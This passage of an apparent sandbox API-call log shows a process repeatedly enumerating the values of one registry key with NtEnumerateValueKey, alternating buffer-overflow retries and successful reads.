"NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "4" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 686 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "5" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 687 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "5" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 688 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "6" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 689 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "6" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 690 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "7" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 691 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "7" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 692 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "8" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 693 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "8" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 694 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "9" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 695 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "9" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 696 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "10" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 697 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "10" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 698 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "11" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 699 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "11" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 700 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "12" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 701 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "12" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 702 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "13" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 703 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "13" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 704 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "14" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 705 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "14" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 706 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "15" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 707 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "15" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 708 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "16" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 709 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "16" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 710 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "17" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 711 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "17" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 712 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "18" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 713 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "18" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 714 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "19" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 715 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "19" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 716 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "20" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 717 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "20" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 718 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "21" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 719 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "21" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 720 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "22" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 721 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "22" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 722 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "23" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 723 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "23" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 724 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "24" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 725 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "24" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 726 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "25" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 727 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "25" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 728 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "26" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 729 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "26" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 730 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "27" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 731 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "27" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 732 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "28" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 733 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "28" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 734 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "29" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 735 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "29" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 736 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "30" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 737 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "30" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 738 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "31" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 739 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "31" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 740 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "32" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 741 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "32" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 742 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "33" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 743 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "33" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 744 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "34" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 745 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "34" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 746 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "35" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 747 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "35" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 748 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "36" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 749 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "36" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 750 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "37" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 751 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "37" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 752 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "38" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 753 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "38" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 754 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "39" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 755 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "39" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 756 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "40" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 757 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "40" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 758 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "41" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 759 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "41" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 760 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": 